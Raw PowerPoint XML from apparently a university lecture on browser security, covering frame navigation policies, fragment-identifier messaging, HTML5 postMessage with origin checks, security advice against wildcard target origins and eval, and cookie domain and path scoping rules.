HTML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Child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91176" name="Picture 41" descr="safar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2675" y="441325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77" name="Picture 42" descr="i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4888" y="1768475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78" name="Picture 43" descr="firefox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3788" y="3911600"/>
            <a:ext cx="53340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79" name="Picture 45" descr="ie-6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0450" y="33909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995363" y="2259013"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="91187" name="Picture 47" descr="i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2" y="1310"/>
              <a:ext cx="48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1188" name="Picture 48" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96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91181" name="Picture 49" descr="ie-6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82675" y="2879725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Navigation policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91183" name="Picture 41" descr="safar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4738" y="5997575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84" name="Picture 42" descr="firefox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85850" y="5495925"/>
            <a:ext cx="53340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85" name="Picture 45" descr="ie-6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4738" y="4918075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86" name="Picture 18" descr="html5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2988" y="6530975"/>
            <a:ext cx="503237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75307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Fragment Identifier Messaging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Send information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>by navigating a frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>gadget.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" u="sng" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>hello</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Navigating to fragment doesn’t reload frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No network traffic, but frame can read its fragment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Not a secure channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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3059013" y="3866927"/>
            <a:ext cx="75723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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66FF66"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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3203029" y="5307087"/>
            <a:ext cx="652463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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a: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3131021" y="4514999"/>
            <a:ext cx="757238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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66FF66"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42032404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/>
      <p:bldP spid="55303" grpId="0"/>
      <p:bldP spid="5530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HTML 5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Cross-origin client side communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Postmessage channel between frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Child policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52228" name="Picture 3" descr="html5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6813" y="4227513"/>
            <a:ext cx="2406650" cy="240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0960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Reply Attack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4276" name="Picture 4" descr="reply-attack-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6138" y="3424238"/>
            <a:ext cx="3975100" cy="247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093" name="Picture 5" descr="reply-attack-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5375" y="3424238"/>
            <a:ext cx="3976688" cy="247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39869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Fix: Improve the API (Standford)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Content Placeholder 3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Let the sending specify the recipient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frame[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“Hello”, “http://gadget.com”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4498975" y="6459538"/>
            <a:ext cx="54006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see Securing Frame Communication in Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24073024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PostMessage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778695"/>
            <a:ext cx="10006460" cy="2677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window.addEventListener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message',function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(event){ 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event.origin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!== 'http://originExpected.com') 	{return;} 	 	 	 			{console.log('received response: ',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event.data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event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999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source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999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postMessage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(‘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received’,event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999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0702" y="5379095"/>
            <a:ext cx="9899773" cy="193899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domain = 'http://destination.com';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myIFrame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').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contentWindow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message = 'Hello!’; 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iframe.postMessage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message,domain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98973" y="1346647"/>
            <a:ext cx="3355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'http://destination.com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54957" y="4937755"/>
            <a:ext cx="5328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frame at 'http://originExpected.com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42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Security considerations postmessage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304800" y="1668463"/>
            <a:ext cx="9601200" cy="5222875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not configure target origin (recipient) to “*”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Sensitive data can be leaked to unknown widgets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Always check for sender’s origin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Always validate data before use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Do not consume data directly with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML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0138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origin policy for cookies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16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990650" y="3457593"/>
            <a:ext cx="4736621" cy="758984"/>
            <a:chOff x="4495800" y="3124200"/>
            <a:chExt cx="4267168" cy="685800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="3124200"/>
              <a:ext cx="3505371" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="3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37" name="TextBox 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8042060" y="3152745"/>
              <a:ext cx="720908" cy="333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scope</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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676698" y="168663"/>
            <a:ext cx="9135428" cy="927647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting/deleting cookies by server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512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53762" y="5903207"/>
            <a:ext cx="9727539" cy="1405526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delete cookie by setting “expires” to date in past</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default scope is domain and path of setting URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1607159" y="1872863"/>
            <a:ext cx="1252950" cy="9276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1370" tIns="50685" rIns="101370" bIns="50685" anchor="ctr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373190" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1718180" y="1983549"/>
            <a:ext cx="1015048" cy="67465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1370" tIns="50685" rIns="101370" bIns="50685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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1184222" y="2800509"/>
            <a:ext cx="1691746" cy="252995"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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1370" tIns="50685" rIns="101370" bIns="50685" anchor="ctr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373192" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1184222" y="3053504"/>
            <a:ext cx="1268809" cy="168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1370" tIns="50685" rIns="101370" bIns="50685" anchor="ctr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373193" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2431885" y="2795239"/>
            <a:ext cx="444083" cy="426928"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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1370" tIns="50685" rIns="101370" bIns="50685" anchor="ctr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373194" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7528269" y="1788531"/>
            <a:ext cx="1353397" cy="1407283"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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1370" tIns="50685" rIns="101370" bIns="50685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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373196" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4295948" y="1770963"/>
            <a:ext cx="969993" cy="37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370" tIns="50685" rIns="101370" bIns="50685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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3129730" y="2614277"/>
            <a:ext cx="6259460" cy="2373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370" tIns="50685" rIns="101370" bIns="50685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tabLst>
                <a:tab pos="1520556" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP Header: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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   Set-cookie:	NAME=VALUE ;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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	domain = (when to send) ;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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	path = (when to send)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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(only send over SSL);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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	expires = (when expires) ;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tabLst>
                <a:tab pos="1957012" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    (later)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373210" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1015048" y="3710588"/>
            <a:ext cx="1916727" cy="65635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lIns="101370" tIns="50685" rIns="101370" bIns="50685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if expires=NULL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>this session only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5134" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2875968" y="2192620"/>
            <a:ext cx="4652301" cy="175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135" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2875968" y="2612522"/>
            <a:ext cx="4652301" cy="175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704323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setting rules   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>(write SOP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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761286" y="1770962"/>
            <a:ext cx="9050840" cy="5818876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u="sng" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   any domain-suffix of URL-hostname, except TLD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	example:     host = “login.site.com”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/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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		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dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Symbol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US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t>  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login.site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can set cookies for all of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</a:rPr>
              <a:t>site.com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/>
              <a:t>but not for another site  or  TLD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:  can be set to anything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44723" y="3574285"/>
            <a:ext cx="2782349" cy="1528391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>allowed domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="27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r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com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04006" y="3574285"/>
            <a:ext cx="3224777" cy="2020834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>disallowed domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>othersite.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="665"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.com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597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Evaluation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TP1: 		01/12/15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>TP2: 		08/12/15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>TP3: 		13/12/15</a:t>
